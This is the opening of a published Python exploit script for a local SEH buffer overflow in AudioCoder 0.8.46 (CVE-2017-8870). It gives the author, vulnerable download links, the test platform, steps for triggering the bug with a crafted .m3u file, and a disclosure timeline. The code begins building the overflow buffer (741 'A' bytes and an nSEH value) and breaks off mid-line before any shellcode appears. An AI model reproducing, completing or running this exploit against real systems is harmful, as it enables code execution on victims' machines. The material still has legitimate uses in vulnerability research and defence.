#!/usr/bin/python # Exploit Title : AudioCoder 0.8.46 Local Buffer Overflow (SEH) # CVE : CVE-2017-8870 # Exploit Author : Muhann4d @0xSecured # Vendor Homepage : http://www.mediacoderhq.com # Vulnerable Software: http://www.mediacoderhq.com/getfile.htm?site=mediatronic.com.au/download&file=AudioCoder-0.8.46.exe # Vulnerable Version : 0.8.46 # Fixed version : N/A # Category : Local Buffer Overflow # Tested on OS : Windows 7 Pro SP1 32bit # How to : Open AudioCoder then drag & drop the .m3u file in it and then press the START button. # Timeline : # 2017-05-05: Vulnerability discovered, vendor has been contaced # 2017-05-08: Vendor replied denying it .."I believe this was an old issue and no longer exists in the latest version" # 2017-05-09: A POC sent to the vendor. No reply since then. # 2017-06-26: Exploit released. print "AudioCoder 0.8.46 Local Buffer Overflow By Muhann4d @0xSecured" from struct import pack junk = "http://" + "\x41" * 741 nseh = pack('